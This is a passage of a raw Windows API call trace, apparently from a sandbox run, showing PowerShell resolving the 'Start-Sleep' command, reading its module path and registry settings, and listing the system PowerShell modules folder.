lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.503] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x3a [0176.504] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0176.504] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.504] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.505] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.505] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0176.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFilePart=0x0) returned 0x36 [0176.506] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0176.506] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.506] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.507] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.509] CoTaskMemAlloc (cb=0x20e) returned 0x5c1970 [0176.509] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5c1970, nSize=0x105 | out: lpBuffer="") returned 0x97 [0176.509] CoTaskMemFree (pv=0x5c1970) [0176.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de708 | out: phkResult=0x1b7de708*=0x680) returned 0x0 [0176.509] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de758, lpData=0x0, lpcbData=0x1b7de750*=0x0 | out: lpType=0x1b7de758*=0x1, lpData=0x0, lpcbData=0x1b7de750*=0x56) returned 0x0 [0176.509] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de758, lpData=0x218af30, lpcbData=0x1b7de750*=0x56 | out: lpType=0x1b7de758*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de750*=0x56) returned 0x0 [0176.510] RegCloseKey (hKey=0x680) returned 0x0 [0176.520] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0176.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de720) returned 1 [0176.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7de800 | out: lpFileInformation=0x1b7de800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de6e0) returned 1 [0176.524] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0176.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0176.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de720) returned 1 [0176.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7de800 | out: lpFileInformation=0x1b7de800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de6e0) returned 1 [0176.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0176.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de720) returned 1 [0176.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7de800 | out: lpFileInformation=0x1b7de800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de6e0) returned 1 [0176.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6a0) returned 1 [0176.614] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0176.614] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7de130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0176.662] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b7de340 | out: lpFindFileData=0x1b7de340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.664] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.665] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0176.666] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0176.666] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0176.666] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0176.666] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0176.667] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0176.668] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", 